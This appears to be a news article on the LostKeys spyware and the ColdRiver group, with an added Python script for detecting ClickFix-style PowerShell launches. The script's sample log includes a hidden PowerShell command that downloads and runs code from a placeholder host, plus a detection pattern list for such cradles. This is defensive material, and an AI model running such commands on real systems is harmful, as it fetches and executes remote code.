Emerging Cyber Threats: The LostKeys Spyware

An analysis of emerging cybersecurity threats related to the LostKeys spyware used by the Russian hacking group ColdRiver.

Google has announced (via Android Headlines) the discovery of a new Russian spyware named LostKeys, utilized by the hacker group ColdRiver, linked to the Russian FSB. This software is designed to steal files and system data from Western organizations.

According to the Google Threat Intelligence Group (GTIG), LostKeys is delivered through ClickFix attacks, a social-engineering technique that begins with a fake CAPTCHA prompt. Victims are tricked into running malicious PowerShell scripts, which then download and execute additional malware. The end goal is to install LostKeys, which behaves like a digital vacuum cleaner, exfiltrating files, directory listings, and system information. The attackers also use other malicious software, including SPICA, to obtain documents.
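The chain described in this paragraph (fake CAPTCHA, a PowerShell command the user is talked into running, a download of further payloads) gives a defender one natural choke point: the PowerShell launch itself. The following is an added example, not code from the article or from Google's report. It is a small Python scanner over constructed process-creation records that scores generic PowerShell download-and-execute indicators (hidden window, encoded command, execution-policy bypass, a download cradle fed to Invoke-Expression) and adds weight when the parent process is explorer.exe, which is an assumption about how a pasted command shows up in telemetry. The record layout, hostnames, user names, URL and indicator list are all constructed for the example and do not come from the article.

```python
"""Score PowerShell launches for ClickFix-style download-and-execute patterns.

Added example for the article above, not part of it. The indicator list is a
set of generic defender heuristics, not anything specific to LostKeys, and the
log records below are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed process-creation records. The layout (timestamp, key=value
# fields, cmd last) is an assumption for the example; a real source such as
# Sysmon Event ID 1 or an EDR process feed would be normalised into it first.
SAMPLE_LOG = r"""
2025-05-07T09:58:01Z host=WS01 user=alice parent=explorer.exe image=powershell.exe cmd=powershell.exe Get-ChildItem C:\Users\alice\Documents
2025-05-07T10:00:14Z host=SRV02 user=svc_backup parent=cmd.exe image=powershell.exe cmd=powershell.exe -NoProfile -File C:\scripts\backup.ps1
2025-05-07T10:01:22Z host=WS01 user=alice parent=explorer.exe image=powershell.exe cmd=powershell.exe -w hidden -nop -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/verify')"
2025-05-07T10:03:45Z host=WS07 user=bob parent=explorer.exe image=powershell.exe cmd=powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
"""

RECORD = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+"
    r"parent=(?P<parent>\S+)\s+image=(?P<image>\S+)\s+cmd=(?P<cmd>.*)$"
)

# (name, regex) pairs. Each one alone is seen in legitimate administration;
# several together on a user-launched shell is what makes a launch suspicious.
INDICATORS = [
    ("encoded_command", re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("no_profile", re.compile(r"-nop(rofile)?\b", re.I)),
    ("policy_bypass", re.compile(r"-e(xecution)?p(olicy)?\s+bypass", re.I)),
    ("download_cradle", re.compile(
        r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|Start-BitsTransfer)", re.I)),
    ("invoke_expression", re.compile(r"(Invoke-Expression|\biex\b)", re.I)),
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Assumption: a command pasted into the Run dialog or Start menu surfaces with
# explorer.exe as the parent, so an interactive launch adds one point.
INTERACTIVE_PARENTS = {"explorer.exe"}
ALERT_THRESHOLD = 2


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    parent: str
    cmd: str
    indicators: List[str] = field(default_factory=list)
    score: int = 0
    alert: bool = False


def analyze(line: str) -> Optional[Finding]:
    """Parse one record and score it; None for non-PowerShell or unparseable lines."""
    m = RECORD.match(line)
    if not m or m["image"].lower() not in POWERSHELL_IMAGES:
        return None
    cmd = m["cmd"]
    hits = [name for name, rx in INDICATORS if rx.search(cmd)]
    score = len(hits) + (1 if m["parent"].lower() in INTERACTIVE_PARENTS else 0)
    return Finding(ts=m["ts"], host=m["host"], user=m["user"], parent=m["parent"],
                   cmd=cmd, indicators=hits, score=score, alert=score >= ALERT_THRESHOLD)


def scan(log_text: str) -> List[Finding]:
    """Return only the records that cross the alert threshold."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        f = analyze(line)
        if f is not None and f.alert:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.host} {f.user} parent={f.parent} score={f.score} "
              f"indicators={','.join(f.indicators)}")
```

On the constructed sample, the two explorer.exe launches that hide the window and fetch remote code, or pass a long encoded command, are flagged; the administrator's scheduled backup script, which uses -NoProfile on its own under cmd.exe, and the plain directory listing stay below the threshold. The threshold and weights are starting points to tune against local baselines, not fixed rules.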

The ColdRiver group has been active since 2017 and is known by other names such as Star Blizzard and Callisto Group. Reports indicate that it has intensified its activities in recent years, particularly following Russia's invasion of Ukraine. The group specializes in cyberespionage, targeting government and defense agencies, think tanks, politicians, journalists, and NGOs.

The United States has already imposed sanctions against certain members of the group and announced a reward of $10 million for information leading to their arrest.

Google's experts stress the need for stronger cybersecurity, especially at organizations likely to be targeted by ColdRiver. They recommend enrolling in Google's Advanced Protection and keeping security systems up to date to guard against similar threats.